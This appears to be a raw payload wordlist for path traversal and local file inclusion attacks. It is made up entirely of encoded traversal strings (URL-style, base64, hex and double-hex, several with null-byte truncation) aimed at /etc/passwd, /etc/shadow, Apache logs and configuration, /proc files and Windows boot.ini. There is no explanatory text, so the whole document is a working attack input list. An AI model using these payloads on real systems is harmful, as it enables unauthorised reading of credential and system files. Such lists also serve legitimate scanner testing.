..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00
2fboot2fgrub2fgrub.conf
2fproc2finterrupts
2fproc2fcpuinfo
2fproc2fmeminfo
..2fapache2flogs2ferror.log
..2fapache2flogs2faccess.log
..2f..2fapache2flogs2ferror.log
..2f..2fapache2flogs2faccess.log
..2f..2f..2fapache2flogs2ferror.log
..2f..2f..2fapache2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log
2fetc2finit.d2fapache
2fetc2finit.d2fapache2
2fetc2fhttpd2fhttpd.conf
2fetc2fapache2fapache.conf
2fetc2fapache2fhttpd.conf
2fetc2fapache22fapache2.conf
2fetc2fapache22fhttpd.conf
2fusr2flocal2fapache22fconf2fhttpd.conf
2fusr2flocal2fapache2fconf2fhttpd.conf
2fopt2fapache2fconf2fhttpd.conf
2fhome2fapache2fhttpd.conf
2fhome2fapache2fconf2fhttpd.conf
2fetc2fapache22fsites-available2fdefault
2fetc2fapache22fvhosts.d2fdefault_vhost.include
2fetc2fpasswd
2fetc2fshadow
2fetc2fgroup
2fetc2fsecurity2fgroup
2fetc2fsecurity2fpasswd
2fetc2fsecurity2fuser
2fetc2fsecurity2fenviron
2fetc2fsecurity2flimits
2fusr2flib2fsecurity2fmkuser.default
L2V0Yy9tYXN0ZXIucGFzc3dk
L21hc3Rlci5wYXNzd2Q=
ZXRjL3Bhc3N3ZA==
ZXRjL3NoYWRvdyUwMA==
L2V0Yy9wYXNzd2Q=
L2V0Yy9wYXNzd2QlMDA=
Li4vZXRjL3Bhc3N3ZA==
Li4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==
Li4vYXBhY2hlL2xvZ3MvZXJyb3IubG9n
Li4vYXBhY2hlL2xvZ3MvYWNjZXNzLmxvZw==
Li4vLi4vYXBhY2hlL2xvZ3MvZXJyb3IubG9n
Li4vLi4vYXBhY2hlL2xvZ3MvYWNjZXNzLmxvZw==
Li4vLi4vLi4vYXBhY2hlL2xvZ3MvZXJyb3IubG9n
Li4vLi4vLi4vYXBhY2hlL2xvZ3MvYWNjZXNzLmxvZw==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvYWNjZXNfbG9n
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvYWNjZXMubG9n
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3JfbG9n
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9n
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL3d3dy9sb2dzL2FjY2Vzc19sb2c=
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL3d3dy9sb2dzL2FjY2Vzcy5sb2c=
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2FjY2Vzc18gbG9n
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2FjY2Vzcy4gbG9n
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL2xvZy9hcGFjaGUvYWNjZXNzX2xvZw==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL2xvZy9hcGFjaGUyL2FjY2Vzc19sb2c=
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL2xvZy9hcGFjaGUvYWNjZXNzLmxvZw==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL2xvZy9hcGFjaGUyL2FjY2Vzcy5sb2c=
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL2xvZy9hY2Nlc3NfbG9n
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL2xvZy9hY2Nlc3MubG9n
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL3d3dy9sb2dzL2Vycm9yX2xvZw==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL3d3dy9sb2dzL2Vycm9yLmxvZw==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2Vycm9yX2wgb2c=
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2Vycm9yLmxvZw==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL2xvZy9hcGFjaGUvZXJyb3JfbG9n
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL2xvZy9hcGFjaGUyL2Vycm9yX2xvZw==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL2xvZy9hcGFjaGUvZXJyb3IubG9n
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL2xvZy9hcGFjaGUyL2Vycm9yLmxvZw==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL2xvZy9lcnJvcl9sb2c=
Li4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL2xvZy9lcnJvci5sb2c=
L2V0Yy9pbml0LmQvYXBhY2hl
L2V0Yy9pbml0LmQvYXBhY2hlMg==
L2V0Yy9odHRwZC9odHRwZC5jb25m
L2V0Yy9hcGFjaGUvYXBhY2hlLmNvbmY=
L2V0Yy9hcGFjaGUvaHR0cGQuY29uZg==
L2V0Yy9hcGFjaGUyL2FwYWNoZTIuY29uZg==
L2V0Yy9hcGFjaGUyL2h0dHBkLmNvbmY=
L3Vzci9sb2NhbC9hcGFjaGUyL2NvbmYvaHR0cGQuY29uZg==
L3Vzci9sb2NhbC9hcGFjaGUvY29uZi9odHRwZC5jb25m
L29wdC9hcGFjaGUvY29uZi9odHRwZC5jb25m
L2hvbWUvYXBhY2hlL2h0dHBkLmNvbmY=
L2hvbWUvYXBhY2hlL2NvbmYvaHR0cGQuY29uZg==
L2V0Yy9hcGFjaGUyL3NpdGVzLWF2YWlsYWJsZS9kZWZhdWx0
L2V0Yy9hcGFjaGUyL3Zob3N0cy5kL2RlZmF1bHRfdmhvc3QuaW5jbHVkZQ==
L2V0Yy9wYXNzd2Q=
L2V0Yy9zaGFkb3c=
L2V0Yy9ncm91cA==
L2V0Yy9zZWN1cml0eS9ncm91cA==
L2V0Yy9zZWN1cml0eS9wYXNzd2Q=
L2V0Yy9zZWN1cml0eS91c2Vy
L2V0Yy9zZWN1cml0eS9lbnZpcm9u
L2V0Yy9zZWN1cml0eS9saW1pdHM=
L3Vzci9saWIvc2VjdXJpdHkvbWt1c2VyLmRlZmF1bHQ=
2f6574632f6d61737465722e706173737764
2f6d61737465722e706173737764
6574632f706173737764
6574632f736861646f77253030
2f6574632f706173737764
2f6574632f706173737764253030
2e2e2f6574632f706173737764
2e2e2f6574632f706173737764253030
2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764253030
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f736861646f77253030
2f2e2e5c2e2e5c2e2e5c2e2e5c2e2e5c2e2e5c77696e6e745c77696e2e696e69
2e2e2f2e2e2f77696e646f77732f77696e2e696e69
2e2e2f2f2e2e2f2f2e2e2f2f2e2e2f2f2e2e2f2f626f6f742e696e69
2e2e5c2e2e2f2e2e5c2e2e2f626f6f742e696e69
2e2e5c2e2e2f2e2e5c2e2e2f2e2e5c2e2e2f2e2e5c2e2e2f626f6f742e696e69
5c2e2e2e2e2e5c5c2e2e2e2e2e5c5c2e2e2e2e2e
643a5c417070536572765c4d7953514c
633a5c417070536572765c4d7953514c
633a57494e444f57532f73797374656d33322f
2f433a5c50726f6772616d2046696c6573
2f443a5c50726f6772616d2046696c6573
2f433a2f696e65747075622f667470726f6f742f
2f626f6f742f677275622f677275622e636f6e66
2f70726f632f696e7465727275707473
2f70726f632f637075696e666f
2f70726f632f6d656d696e666f
2e2e2f6170616368652f6c6f67732f6572726f722e6c6f67
2e2e2f6170616368652f6c6f67732f6163636573732e6c6f67
2e2e2f2e2e2f6170616368652f6c6f67732f6572726f722e6c6f67
2e2e2f2e2e2f6170616368652f6c6f67732f6163636573732e6c6f67
2e2e2f2e2e2f2e2e2f6170616368652f6c6f67732f6572726f722e6c6f67
2e2e2f2e2e2f2e2e2f6170616368652f6c6f67732f6163636573732e6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f68747470642f6c6f67732f61636365735f6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f68747470642f6c6f67732f61636365732e6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f68747470642f6c6f67732f6572726f725f6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f68747470642f6c6f67732f6572726f722e6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7661722f7777772f6c6f67732f6163636573735f6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7661722f7777772f6c6f67732f6163636573732e6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7573722f6c6f63616c2f6170616368652f6c6f67732f6163636573735f206c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7573722f6c6f63616c2f6170616368652f6c6f67732f6163636573732e206c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7661722f6c6f672f6170616368652f6163636573735f6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7661722f6c6f672f617061636865322f6163636573735f6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7661722f6c6f672f6170616368652f6163636573732e6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7661722f6c6f672f617061636865322f6163636573732e6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7661722f6c6f672f6163636573735f6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7661722f6c6f672f6163636573732e6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7661722f7777772f6c6f67732f6572726f725f6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7661722f7777772f6c6f67732f6572726f722e6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7573722f6c6f63616c2f6170616368652f6c6f67732f6572726f725f6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7573722f6c6f63616c2f6170616368652f6c6f67732f6572726f722e6c206f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7661722f6c6f672f6170616368652f6572726f725f6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7661722f6c6f672f617061636865322f6572726f725f6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7661722f6c6f672f6170616368652f6572726f722e6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7661722f6c6f672f617061636865322f6572726f722e6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7661722f6c6f672f6572726f725f6c6f67
2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f7661722f6c6f672f6572726f722e6c6f67
2f6574632f696e69742e642f617061636865
2f6574632f696e69742e642f61706163686532
2f6574632f68747470642f68747470642e636f6e66
2f6574632f6170616368652f6170616368652e636f6e66
2f6574632f6170616368652f68747470642e636f6e66
2f6574632f617061636865322f617061636865322e636f6e66
2f6574632f617061636865322f68747470642e636f6e66
2f7573722f6c6f63616c2f617061636865322f636f6e662f68747470642e636f6e66
2f7573722f6c6f63616c2f6170616368652f636f6e662f68747470642e636f6e66
2f6f70742f6170616368652f636f6e662f68747470642e636f6e66
2f686f6d652f6170616368652f68747470642e636f6e66
2f686f6d652f6170616368652f636f6e662f68747470642e636f6e66
2f6574632f617061636865322f73697465732d617661696c61626c652f64656661756c74
2f6574632f617061636865322f76686f7374732e642f64656661756c745f76686f73742e696e636c756465
2f6574632f706173737764
2f6574632f736861646f77
2f6574632f67726f7570
2f6574632f73656375726974792f67726f7570
2f6574632f73656375726974792f706173737764
2f6574632f73656375726974792f75736572
2f6574632f73656375726974792f656e7669726f6e
2f6574632f73656375726974792f6c696d697473
2f7573722f6c69622f73656375726974792f6d6b757365722e64656661756c74
32663664363137333734363537323265373036313733373337373634
3635373436333266373036313733373337373634
3635373436333266373336383631363436663737323533303330
32663635373436333266373036313733373337373634
32663635373436333266373036313733373337373634323533303330
3265326532663635373436333266373036313733373337373634
3265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634
3265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663265326532663635373436333266373036313733373337373634323533303330
